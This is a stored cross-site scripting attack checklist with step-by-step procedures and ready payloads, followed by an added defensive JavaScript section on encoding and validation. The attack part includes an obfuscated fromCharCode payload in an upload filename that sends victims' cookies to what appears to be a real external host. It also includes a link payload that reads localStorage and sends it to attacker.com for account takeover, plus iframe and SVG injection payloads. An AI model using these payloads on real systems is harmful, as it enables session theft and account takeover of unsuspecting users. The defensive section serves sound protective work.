Stored Cross Site Scripting

Check List

Methodology

Black Box

Blind XSS

1. Set up an HTTP/HTTPS proxy (e.g., Burp Suite) and enable Intercept
2. Open the target support/chat interface and start uploading a file to the chat
3. When the upload request is captured, pause it in the proxy (Intercept)
4. Modify the filename field in the intercepted upload request to the exact string below:

   "><img src=1 onerror="url=String.fromCharCode(104,116,116,112,115,58,47,47,103,97,116,111,108,111,117,99,111,46,48,48,48,119,101,98,104,111,115,116,97,112,112,46,99,111,109,47,99,115,109,111,110,101,121,47,105,110,100,101,120,46,112,104,112,63,116,111,107,101,110,115,61)+encodeURIComponent(document['cookie']);xhttp = new XMLHttpRequest();xhttp.open('GET',url,true);xhttp.send();">

5. Forward the modified request so the file with the altered filename appears in the chat
6. Open or refresh the support chat page; when the filename containing the payload is rendered, the XSS should trigger


1. Go to another user's profile
2. Click "private message"
3. Type any subject
4. Type the following message: Test<iframe src=javascript:alert(1) width=0 height=0 style=display:none;></iframe>
5. Send the message
6. View the message (this triggers the XSS)
7. Wait for the victim to read the message


XSS In JSON Parameter

1. Log in and browse the site while keeping Burp Suite active
2. Review the captured API requests and note the ones that carry JSON parameters
3. Return to one of those API endpoints, trigger a request to it again, and intercept that request in the proxy
4. Inject XSS payloads into the JSON parameters (the ipAddress parameter can be injected as well)
5. For example, the request body below is from a real case:

   {
       "ipAddress": "<svg on onload=(alert)(document.domain)>",
       "callBackURL":"dssdsd"
   }

6. After the request is sent, the server may respond with a 400 error code, but the payload has still been injected and the vulnerability is present


localStorage Data Exfiltration To An Attacker Server Via XSS

1. Open Chrome DevTools (press F12) and navigate to the Sources > Page tab
2. Search the JavaScript files: use Ctrl+F to look for keywords such as path:, url:, api/, v1/
3. Identify a hidden endpoint: locate an unlinked POST endpoint, such as /platform/apps/lighthouse-homepage, from a fetch() call
4. Test a basic XSS payload: submit a POST request with the body {"userInput": "<a href=\"javascript:alert(1)\">clickme"}
5. Verify XSS execution: confirm the alert(1) popup, which proves unsanitized rendering
6. Inspect localStorage: in the DevTools Console, run JSON.stringify(localStorage) to identify sensitive keys
7. Craft a regex-based exfiltration payload:

   <a href="javascript:var match=JSON.stringify(localStorage).match(/ZNavIdentity\.userId=[^&]+&currEntityId=[^&]+/);if(match)fetch('https://attacker.com/?data='+encodeURIComponent(match[0]))">Click to "Verify"</a>

8. Submit the stored XSS payload: POST {"userInput": [above payload]} to store the malicious link
9. Monitor the attacker server: check https://attacker.com for the exfiltrated userId and currEntityId from localStorage
10. Verify account takeover: confirm the stolen PII enables full account access and privilege escalation
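Each procedure in this checklist depends on untrusted input (an uploaded filename, a message body, a JSON field, a user-supplied link) being written into a page as markup. As an added defensive example that is not part of the original checklist, the JavaScript below shows the output encoding, URL-scheme allowlisting and input validation that stop those same payloads; the function names, the example.invalid base URL and the abbreviated filename payload are assumptions.

```javascript
// Added defensive example, not code from the checklist: encoding, URL vetting and
// validation that neutralise the payloads quoted above. Function names are hypothetical.

// Encode untrusted text for HTML text and double-quoted attribute contexts.
function encodeForHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Allow only http(s) URLs in href. The WHATWG URL parser strips leading whitespace
// and lower-cases the scheme, so variants like "\t JaVaScRiPt:" are caught as well.
function safeHref(url, base = 'https://example.invalid/') {
  let parsed;
  try { parsed = new URL(String(url), base); } catch (e) { return '#'; }
  return ['http:', 'https:'].includes(parsed.protocol) ? parsed.href : '#';
}

// Server-side allowlist for the "ipAddress" JSON field: anything that is not a
// dotted-quad IPv4 address is rejected before it can reach a template.
function isValidIPv4(s) {
  const parts = String(s).split('.');
  return parts.length === 4 &&
    parts.every((p) => /^(0|[1-9]\d{0,2})$/.test(p) && Number(p) <= 255);
}

// Uploaded filename shown in the chat (the blind-XSS injection point).
function renderFilename(filename) {
  const safe = encodeForHtml(filename);
  return `<span class="file" title="${safe}">${safe}</span>`;
}

// Private-message body (the <iframe src=javascript:...> step), shown as literal text.
function renderMessage(body) {
  return `<p class="msg">${encodeForHtml(body)}</p>`;
}

// User-supplied link (the localStorage exfiltration step): encoded text, vetted href.
function renderLink(text, href) {
  return `<a href="${encodeForHtml(safeHref(href))}" rel="noopener noreferrer">${encodeForHtml(text)}</a>`;
}

// Payloads quoted from the checklist (filename abbreviated); constructed test input only.
const SAMPLES = {
  filename: '"><img src=1 onerror="alert(document.cookie)">',
  message: 'Test<iframe src=javascript:alert(1) width=0 height=0 style=display:none;></iframe>',
  ipAddress: '<svg on onload=(alert)(document.domain)>',
  href: 'javascript:var match=JSON.stringify(localStorage)',
};
```

Encoding is only the last line of defence; a Content-Security-Policy without unsafe-inline and HttpOnly cookies limit what a payload that does slip through can reach.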

